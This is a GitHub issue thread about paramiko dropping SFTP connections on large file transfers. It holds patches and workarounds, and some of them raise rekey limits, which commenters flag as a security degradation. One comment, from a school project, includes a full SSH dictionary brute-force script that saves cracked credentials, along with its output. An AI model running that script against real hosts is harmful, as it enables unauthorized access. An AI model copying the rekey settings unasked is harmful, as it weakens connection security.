
EOFError when getting a big file (900MB) via SFTP. #151

Closed
etienned opened this issue Mar 22, 2013 · 40 comments

@etienned

I'm trying to use duplicity to back up my server to a CrushFTP server (Windows) over SFTP, but it always drops the connection when getting some big files.

So I tried to get a problematic file with paramiko directly and got the same error, Server connection dropped, meaning an EOFError was raised (bytes received == 0). I put a print statement in the _read_all method to show how many bytes were received. In one thread the count climbs rapidly to 32777 and then stays there. Another thread goes up to 7049, then back to 0, and then never gets above 200. After a very long time (many minutes) I receive the EOFError.
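
For reference, a minimal sketch of the kind of direct download described above (host, credentials, and paths are placeholders):

    import paramiko

    client = paramiko.SSHClient()
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    client.connect("sftp.example.com", username="user", password="secret")
    sftp = client.open_sftp()
    # stalls, then eventually fails with "Server connection dropped" (EOFError)
    sftp.get("/remote/big_file.bin", "/tmp/big_file.bin")
    client.close()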

If I try to get the same file with lftp it works without any problems.

Using paramiko 1.10.0 and Python 2.6.5 on Ubuntu Server 10.04 LTS amd64.

@kaorihinata

I think this might be related to issue #124 in which I'm also accessing a Windows hosted SFTP server (GlobalSCAPE) and downloading pretty large files (hundreds of MBs to tens of GBs). Do you have access to the SFTP server itself as well as its logs? That's the one thing I don't have access to with our current vendor. Otherwise, all of the symptoms you mention above match what we're seeing.

@etienned
Author

etienned commented Apr 2, 2013

Yes, it's possibly related. There are also at least two posts on Stack Overflow that are probably related.

About the SFTP server logs: it might be possible for me to get access to them, but not easily. The admin running the server told me that there's nothing abnormal in the logs, though.

@kaorihinata

I'm in a similar situation. We can get access to the logs, but the admin in charge is rather difficult to deal with and will most likely intentionally ignore our tickets. To add insult to injury, while we have managed to get logs from them before, GlobalSCAPE is a multi-protocol solution, so it mangles the logs into a standard "FTP-ish" format before saving them. As a result, any information specific to SFTP is lost. I don't think they'd give me the time of day if I asked for debug logs (if the product even supports them).

We were also told that there's "nothing abnormal" about our logs, but when they actually gave them to us, the logs indicated that multiple download attempts for the same file finished successfully, each after transferring differing numbers of bytes (far smaller than the actual size of the file). Additionally, they never recorded the disconnection. If you can get a few chunks of log to scrutinize yourself, it might be more helpful. If you can get protocol-specific logs, even better. I'm not expecting a lot from these Windows SFTP server solutions though.

@mikegeise

Has there been any traction on this? I am hitting the same roadblock with a file over 1GB in size.

@kaorihinata

Unfortunately not. I've been using Perl + Net::SFTP::Foreign as a replacement for the time being, mainly because it piggybacks on the openssh binary, which has proven to be far more reliable.

@rsheshadri

Any updates on this? I'm running into the same error.

@kaorihinata

Not that I'm aware of. I assume the current maintainer mostly uses it for his deployment solution (fabric), so issues with large files on platforms he doesn't (officially?) support anyway don't seem to attract much interest. It's also a pain to reproduce this bug without an appropriate file and server combination, and nobody has come forward to try to troubleshoot it, so I've just avoided using paramiko since it can't be relied on for my purposes.

@rsheshadri

Any suggestions on other modules I can use instead of paramiko?

@rsheshadri

For large files, that is.

@bitprophet
Member

@kaorihinata is mostly right, though I do my best to look at things from a "pure" paramiko standpoint (i.e. I won't ignore an issue just because it doesn't impact Fabric, even if Fabric-related issues do get more love). The problem here is much more the difficulty in reproducing & the nonstandard platform :(

Always open to merging patches where users say "this fixes my problem X" and which can be proven not to break, e.g., POSIX platforms, but this ticket's not at that stage yet unless I'm missing something.

@kaorihinata

To be honest, I'd probably blame the vendor for their loose interpretation of the standard and dubious definition of "production ready" when it comes to code. It may be the case that OpenSSH works with these servers due to workarounds for broken servers. If I come across the issue again, I will try to determine the cause.

@rsheshadri

@kaorihinata so what do you currently use to transfer files > 1GB? Fabric? If so, can you point me to a link where I can find sample code to implement a similar get operation using it?

@kaorihinata

@rsheshadri I wasn't required to use Python as long as I had a working solution, and since the script was pretty simple, I switched to Net::SFTP::Foreign with Perl. It uses the OpenSSH client on the backend, so compatibility is the best you're going to get.

@joostdevries

Running into this issue with a significantly smaller file too. I've tracked it down to the fact that the max packet_size/window_size are very small after connecting (4096 and 32759). If I manually override these values, I can get to 2.1 MB before the upload stalls. This only occurs on a handful of remotes.

The only way of overriding them that has worked so far is:

        sftp_connection.get_channel().in_window_size = 2097152
        sftp_connection.get_channel().out_window_size = 2097152
        sftp_connection.get_channel().in_max_packet_size = 2097152
        sftp_connection.get_channel().out_max_packet_size = 2097152
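
In context, a minimal sketch of where these overrides sit (the host and credentials are placeholders; get_channel() only works once the SFTP session is open):

    import paramiko

    transport = paramiko.Transport(("sftp.example.com", 22))
    transport.connect(username="user", password="secret")
    sftp_connection = paramiko.SFTPClient.from_transport(transport)

    # widen the window/packet limits negotiated at connect time
    channel = sftp_connection.get_channel()
    channel.in_window_size = 2097152
    channel.out_window_size = 2097152
    channel.in_max_packet_size = 2097152
    channel.out_max_packet_size = 2097152

    sftp_connection.put("local.bin", "/remote/local.bin")
    transport.close()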

@bitprophet would love to work with you on debugging this.

@horida

horida commented Jul 24, 2015

I recently ran into a similar problem when downloading files larger than 100MB from a CrushFTP server. What happened was that the CrushFTP server closed the socket as soon as paramiko requested a packet beyond the file size. This is actually what happens in SFTPFile.read at the end of the while loop. Curiously enough, this only happens with files larger than 100MB, but I guess this might be some configuration of the CrushFTP server. For smaller files I received EOF when reading beyond the file's size (@bitprophet: I do not really understand why paramiko is doing this).

The following changes in the code solved the problem for me:
in SFTPFile.read (with complete_file_size being passed as an extra argument to the method):

    while len(self._rbuffer) < size:
        read_size = size - len(self._rbuffer)
        if self._flags & self.FLAG_BUFFERED:
            read_size = max(self._bufsize, read_size)
        try:
            new_data = self._read(read_size)
        except EOFError:
            new_data = None
        if (new_data is None) or (len(new_data) == 0):
            break
        self._rbuffer += new_data
        self._realpos += len(new_data)
        # NOTE: this is the break condition I added to check if I read the complete file
        if self._realpos >= complete_file_size:
            break

Furthermore, in SFTPClient.getfo, an extra break condition to avoid calling read again:

        while True:
            data = fr.read(32768, file_size) # NOTE: passing the filesize
            fl.write(data)
            size += len(data)
            if callback is not None:
                callback(size, file_size)
            # NOTE: I could actually use the callback here, but since I was patching
            # the code anyway, this is a second break to avoid calling fr.read again
            if size == file_size:
                break
            if len(data) == 0:
                break

@lndbrg
Contributor

lndbrg commented Jul 24, 2015

@horida can you send them as a pull request so I can look into it and see if I can figure out why it's misbehaving? (That pull request probably won't be merged, but I know where in the code the issues are.)

@horida

horida commented Jul 28, 2015

@lndbrg here is the pull request: #564
It is not really ready to merge (as you anticipated), but it shows the fix that solved the problem for me.
Don't hesitate to contact me in case of any questions.
Thanks for your efforts.

@ansell

ansell commented Dec 16, 2015

It would be great to see a review of pull request #564 and to create a full fix for this issue.

@ansell

ansell commented Dec 16, 2015

I am getting this issue communicating with OpenSSH-6.2 server btw, so the "Nonstandard platforms" tag isn't relevant to me.

debug1: Remote protocol version 2.0, remote software version OpenSSH_6.2

@bpownow

bpownow commented Feb 23, 2016

Has this been fixed? I'm getting SSHException: Server connection dropped at around 168MB into an upload to an SFTP server.

@rsheshadri did you find a good workaround (using Python)?

@duritong

This is becoming more and more of a problem with duplicity and bigger backups. Luckily duplicity has a "legacy" ssh backend that can be used successfully instead of the paramiko one:
http://duplicity.nongnu.org/duplicity.1.html#sect21

--ssh-backend pexpect

The proposed patch in #564 did not work for me, talking to a Debian wheezy OpenSSH server.

@joostdevries

FYI: I actually ended up implementing a combo of the normal sftp command with pexpect. Have not had issues since.

@ansell

ansell commented Mar 1, 2016

FYI, I abandoned Paramiko and am sending things successfully using the system scp executable.

@dardanxhymshiti

Any solution to this problem yet? I am still facing this error when downloading files over 500MB.

@kaorihinata

I'm unaware of any solution to this. It's also a bit difficult to reproduce with any consistency. It would make it a lot easier to solve if someone was able to reproduce it consistently, and someone else attached to the ticket was able to confirm the method. In my case it was random, so it was difficult to pin down what was happening.

@wieslaw-nosal

Ran into the same problem with 600MB files. Is there any proper fix for this?

@torzsmokus

My workarounds: https://stackoverflow.com/a/48170689/501765

@magnusja

magnusja commented Jul 4, 2019

        with paramiko.Transport((server, 22)) as transport:
            # SFTP FIXES
            transport.default_window_size = paramiko.common.MAX_WINDOW_SIZE // 2
            # transport.default_max_packet_size = paramiko.common.MAX_WINDOW_SIZE
            transport.packetizer.REKEY_BYTES = pow(2, 40)  # 1TB max, this is a security degradation!
            transport.packetizer.REKEY_PACKETS = pow(2, 40)  # 1TB max, this is a security degradation!
            # / SFTP FIXES

            transport.connect(username=username, password=pw)
            with paramiko.SFTPClient.from_transport(transport) as sftp:
                sftp.get_channel().in_window_size = 2097152
                sftp.get_channel().out_window_size = 2097152
                sftp.get_channel().in_max_packet_size = 2097152
                sftp.get_channel().out_max_packet_size = 2097152
                files = sftp.listdir()
                files = list(filter(lambda x: x.endswith(".zip"), files))
                print(files)

                if len(files) > 2:
                    for f in files:
                        target = str(dst / f)
                        print(f"Downloading {f} to {target}")
                        sftp.get(f, target)

                    for f in files:
                        sftp.remove(f)

This fixes it for me for files > 600MB

(not sure what exactly I did there but it works ¯\_(ツ)_/¯)

@zachliu

zachliu commented Jan 9, 2020

transport = paramiko.Transport((host, port))

transport.default_window_size = paramiko.common.MAX_WINDOW_SIZE

transport.packetizer.REKEY_BYTES = pow(2, 40)
transport.packetizer.REKEY_PACKETS = pow(2, 40)

This fix works for us. Now we're able to download that stupid 3.2 GB file.

@mrprobz

mrprobz commented Mar 5, 2021

Where does one add this piece when using, for example, pysftp, which uses paramiko?

@malthe

malthe commented Jun 8, 2021

From RFC 4253:

It is RECOMMENDED that the keys be changed after each gigabyte of transmitted data or after each hour of connection time, whichever comes sooner.

It seems that the right fix here is perhaps to adjust (increase) the data and/or time limits for rekeying, but also to fix whatever bug is causing the connection to drop when rekeying happens?
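
As a sketch (placeholder host and credentials; the values mirror the snippets elsewhere in this thread):

    import paramiko

    transport = paramiko.Transport(("sftp.example.com", 22))
    # Rekey only after ~1TB of data or 2**40 packets instead of the defaults.
    # NOTE: this weakens the RFC 4253 recommendation quoted above; it is a
    # deliberate security degradation, not a fix for the underlying drop.
    transport.packetizer.REKEY_BYTES = pow(2, 40)
    transport.packetizer.REKEY_PACKETS = pow(2, 40)
    transport.connect(username="user", password="secret")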

@gabrielconlon

gabrielconlon commented Sep 9, 2021

Has anyone been able to track down the issue with this? I have been able to recreate the error repeatedly during a school project, attempting to write a Python script to brute-force SSH.

Looking at the packetizer docs for paramiko's packet handling, I notice that write_all is not included, but there is an EOFError for read_all.

All the Stack Overflow links above seem to discuss issues with file size.

Traceback

Invalid credentials for: student:123456
Invalid credentials for: student:1234567
Invalid credentials for: student:12345678
Valid Credentials: HOSTNAME: localhost
              USERNAME: student
              PASSWORD: password
              PORT: 1818
              
Invalid credentials for: mysql:123456
Invalid credentials for: mysql:1234567
Invalid credentials for: mysql:12345678
Invalid credentials for: mysql:password
Invalid credentials for: mysql:pasword123456
Invalid credentials for: mysql:password1234
Invalid credentials for: mysql:password!
Traceback (most recent call last):
  File "/Users/gabrielconlon/Projects/sshBruteForce/sshBruteForce.py", line 71, in <module>
    if checkConnection(target, u, p, port):
  File "/Users/gabrielconlon/Projects/sshBruteForce/sshBruteForce.py", line 22, in checkConnection
    client.connect(hostname=target, username=username, password=password, port=port, timeout=2)
  File "/Users/gabrielconlon/.pyenv/versions/3.9.5/lib/python3.9/site-packages/paramiko/client.py", line 406, in connect
    t.start_client(timeout=timeout)
  File "/Users/gabrielconlon/.pyenv/versions/3.9.5/lib/python3.9/site-packages/paramiko/transport.py", line 660, in start_client
    raise e
  File "/Users/gabrielconlon/.pyenv/versions/3.9.5/lib/python3.9/site-packages/paramiko/transport.py", line 2034, in run
    self.packetizer.write_all(b(self.local_version + "\r\n"))
  File "/Users/gabrielconlon/.pyenv/versions/3.9.5/lib/python3.9/site-packages/paramiko/packet.py", line 367, in write_all
    raise EOFError()
EOFError

This errors every time at that exact spot in the file (line 7) no matter what is written there. Code below:

#!/usr/bin/env python3
##################################################
# SSH Brute Force
# Gabriel Conlon
# created: 09 September 2021
# in fulfillment of requirements for:
# SecureSet Cybersecurity Engineer Networks 400
##################################################

import paramiko
import socket
import argparse

# prompt user for port to check, default 22

def checkConnection (target, username, password, port):
    client = paramiko.SSHClient()
    # add known hosts
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    try:
        client.connect(hostname=target, username=username, password=password, port=port, timeout=2)
        client.open_sftp()
    except socket.timeout:
        print("Target unreachable")
        return False
    except paramiko.AuthenticationException:
        print(f"Invalid credentials for: {username}:{password}")
        return False
    except paramiko.SSHException:
        print("Uncaught SSH exception")
        return False
    # except EOFError:
    #     return False
    # except:
    #     print("Unknown exception")
    #     return False
    else:
        # connection established
        print(f"""Valid Credentials: HOSTNAME: {target}
              USERNAME: {username}
              PASSWORD: {password}
              PORT: {port}
              """)
        # command = "id"
        # print(f"User privileges: {client.exec_command(command)}")
        client.close()
        return True

if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="SSH Dictionary Attack")
    parser.add_argument("target", help="Target machine")
    parser.add_argument("-p", "--port", help="Port")
    parser.add_argument("-P", "--passwords", help="Password file")
    parser.add_argument("-u", "--username", help="SSH Username")

    #parse args
    args = parser.parse_args()
    target = args.target
    passwords = args.passwords
    users = args.username
    port = args.port

    # read files
    users = open(users).read().splitlines()
    passwords = open(passwords).read().splitlines()

    # attack
    for u in users:
        for p in passwords:
            if checkConnection(target, u, p, port):
                # save if valid (append so earlier matches are not overwritten)
                with open("validCreds.txt", "a") as creds_file:
                    creds_file.write(f"""
                Username: {u}@{target}
                Password: {p}
                """)
                break

@jobo3208

jobo3208 commented Jan 21, 2022

@mrprobz

Where does one add this piece when using, for example, pysftp, which uses paramiko?

It's not documented AFAIK, but this will work for pysftp in a pinch:

with pysftp.Connection(...) as sftp:
    sftp._transport.default_window_size = paramiko.common.MAX_WINDOW_SIZE
    sftp._transport.packetizer.REKEY_BYTES = pow(2, 40)  # security degradation
    sftp._transport.packetizer.REKEY_PACKETS = pow(2, 40)  # security degradation

    ...

@torzsmokus

@jobo3208
@zachliu

I suggest always adding the security warning as a comment to these fixes, as the implied security degradation is not self-evident.

@kkr78

kkr78 commented Mar 9, 2022

We have been using the following code for quite a long time, and it has worked for the majority of large files up to 10GB. Today we started seeing errors when downloading 21GB files. Is there any way to fix it? What's the biggest file you are able to download with paramiko?

Env:
paramiko-2.9.2
Python 2 and 3 (same issue with both)

Error:

    SSHException('Server connection dropped: ',))
    Exception in thread Thread-3:
    Traceback (most recent call last):
      File "/usr/lib64/python2.7/threading.py", line 804, in __bootstrap_inner
        self.run()
      File "/usr/lib64/python2.7/threading.py", line 757, in run
        self.__target(*self.__args, **self.__kwargs)
      File "/home/ec2-user/.local/lib/python2.7/site-packages/paramiko/sftp_file.py", line 538, in _prefetch_thread
        self, CMD_READ, self.handle, long(offset), int(length)
      File "/home/ec2-user/.local/lib/python2.7/site-packages/paramiko/sftp_client.py", line 846, in _async_request
        self._send_packet(t, msg)
      File "/home/ec2-user/.local/lib/python2.7/site-packages/paramiko/sftp.py", line 198, in _send_packet
        self._write_all(out)
      File "/home/ec2-user/.local/lib/python2.7/site-packages/paramiko/sftp.py", line 162, in _write_all
        n = self.sock.send(out)
      File "/home/ec2-user/.local/lib/python2.7/site-packages/paramiko/channel.py", line 801, in send
        return self._send(s, m)
      File "/home/ec2-user/.local/lib/python2.7/site-packages/paramiko/channel.py", line 1198, in _send
        raise socket.error("Socket is closed")
    error: Socket is closed

Code:

    import paramiko

    client = paramiko.SSHClient()
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    client.connect(connection.get('host'), username=connection.get('login'), password=connection.get('password'))

    tr = client.get_transport()
    tr.packetizer.REKEY_BYTES = pow(2, 40)
    tr.packetizer.REKEY_PACKETS = pow(2, 40)
    tr.default_max_packet_size = 200 * 1024 * 1024
    tr.default_window_size = paramiko.common.MAX_WINDOW_SIZE
    sftp = client.open_sftp()

@kkr78

kkr78 commented Mar 15, 2022

Any update on this? If this can't be resolved with paramiko, we have to look for a different solution. Has anyone been able to download files larger than 10GB with paramiko? What's the largest file that has been downloaded or tested with paramiko? If there is an alternative solution, please let me know.

@jprafael

I noticed that using prefetch=False solved both the EOFError and the occasional hangs waiting for the final few bytes (which would never come). The symptoms seem to suggest some race condition in the async download code.

With prefetch=False the download is slow but consistent. One of the issues is the hardcoded packet size, which is there for compatibility but is small for modern servers. I copy-pasted my way out of it and got reasonable speeds (though not as good as with prefetch=True).
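
(If your paramiko release is recent enough that SFTPClient.get() accepts a prefetch keyword argument, check your installed version since this is an assumption, the one-line form of the workaround is:

    # sequential download: slower, but sidesteps the prefetch race
    sftp_client.get("/remote/big_file.bin", "/tmp/big_file.bin", prefetch=False)

where sftp_client is an open SFTPClient and the paths are placeholders.)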

For those in need of a short term solution:

def paramiko_sftp_get(
        sftp_client: SFTPClient,
        sftp_file: str,
        local_file: str,
        callback: Callable[[int, int], None],
        max_request_size: int = 2 ** 20) -> int:
    """
    A copy of paramiko's sftp.get() function that allows for sequential download
    of large chunks.
    This is a work around for https://github.com/paramiko/paramiko/issues/151.
    The issue does not occur when prefetch=False (i.e. sequential download) indicating
    that there seems to be an error with the parallel approach. However, the sequential
    version in paramiko does not allow customizable request size, and instead hardcodes a
    small value that is known to work with many SFTP implementations.
    With the possibility of large chunks, the sequential download's RTT overhead becomes
    less of a pain and a viable alternative.
    :param sftp_client: Paramiko's SFTPClient.
    :param sftp_file: The remote file in sftp.
    :param local_file: The local file.
    :param callback: A function that is invoked on every chunk.
    :param max_request_size: The max request size, defaults to 2**20.
    :return: The size of the file in bytes.
    """

    with open(local_file, "wb") as local_handle:
        file_size = sftp_client.stat(sftp_file).st_size
        assert file_size is not None

        with sftp_client.open(sftp_file, "rb") as remote_handle:
            paramiko_transfer_with_callback(
                remote_handle,
                local_handle,
                file_size,
                callback,
                max_request_size
            )

    return file_size


def paramiko_transfer_with_callback(
        reader: SFTPFile,
        writer: BinaryIO,
        file_size: int,
        callback: Callable[[int, int], None],
        max_request_size: int):
    """
    A copy of paramiko's sftp_client._transfer_with_callback with max_request_size support.
    :param reader: The reader file handle.
    :param writer: The writer file handle.
    :param file_size: The size of the file to be downloaded.
    :param callback: A function that is invoked on every chunk.
    :param max_request_size: The max request size, defaults to 2**20.
    """
    size = 0

    while True:
        remaining = file_size - size
        chunk = min(max_request_size, remaining)

        data = reader.read(chunk)
        writer.write(data)
        size += len(data)

        if len(data) == 0:
            break

        if callback is not None:
            callback(size, file_size)

    assert size == file_size

I believe this value, along with SFTPFile.MAX_REQUEST_SIZE, could be made configurable in Transport settings for a clean solution.
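
(A blunter stopgap, untested here: monkey-patch the class attribute before downloading. SFTPFile.MAX_REQUEST_SIZE is the hardcoded per-request size mentioned above, and changing it affects every SFTPFile in the process.)

    import paramiko.sftp_file

    # raise the per-request read size from the 32KB default to 1MB
    paramiko.sftp_file.SFTPFile.MAX_REQUEST_SIZE = 2 ** 20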

@bitprophet
Member

We're going to merge #2058 which will likely solve this; please open new issues after the next feature release (should be Paramiko 3.3) if you continue to reproduce the issue. Thanks!

@robguttman

We're going to merge #2058 which will likely solve this; please open new issues after the next feature release (should be Paramiko 3.3) if you continue to reproduce the issue. Thanks!

Thanks, @bitprophet! When should we expect to see Paramiko 3.3 on PyPI?

@bskinn
Contributor

bskinn commented Jun 25, 2023

When should we expect to see Paramiko 3.3 on PyPI?

My guess is it will be sometime in the next couple of months, but it could be longer.

I believe bitprophet wants to give time for the experimental key/auth features in v3.2 to work their way out into the wild & have some feedback come in before taking the next step on those in v3.3.

Plus, it's all dependent on the pace bitprophet can reach with his open source allocation, given that his time is split among multiple projects.
